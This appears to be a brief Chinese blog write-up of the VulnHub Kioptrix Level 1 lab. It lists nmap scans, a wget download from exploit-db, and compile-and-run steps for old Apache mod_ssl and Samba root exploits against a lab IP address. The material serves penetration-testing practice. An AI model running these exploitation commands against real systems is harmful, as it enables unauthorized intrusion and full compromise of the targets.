- nmap -sP 192.168.21.133/24 #主机发现
- nmap -sC -sV -A -p 1-65535 -f -T4 192.168.21.136 #22/80/111/139/443/1024,服务探测
- exp获权
https://www.exploit-db.com/search?cve=2002-0082第一个下载
gcc -o exp 47080.c -lcrypto 编译
./exp
./exp | grep apache-1.3.20
./exp 0x6b 192.168.21.136 -c 40
whoami(root成功,不成功就是apache权限) - msf获权
search smb_ver
use 0
show options
set threads 30
set rhosts 192.168.21.136
run #探测获得Samba2.2.1a
wget -O t.c https://www.exploit-db.com/download/10
gcc -o tt t.c
./tt -b 0 192.168.21.136
- exp获权
vulnhub-Kioptrix_level_1笔记
发布于 2022-03-07 1391 次阅读
Comments NOTHING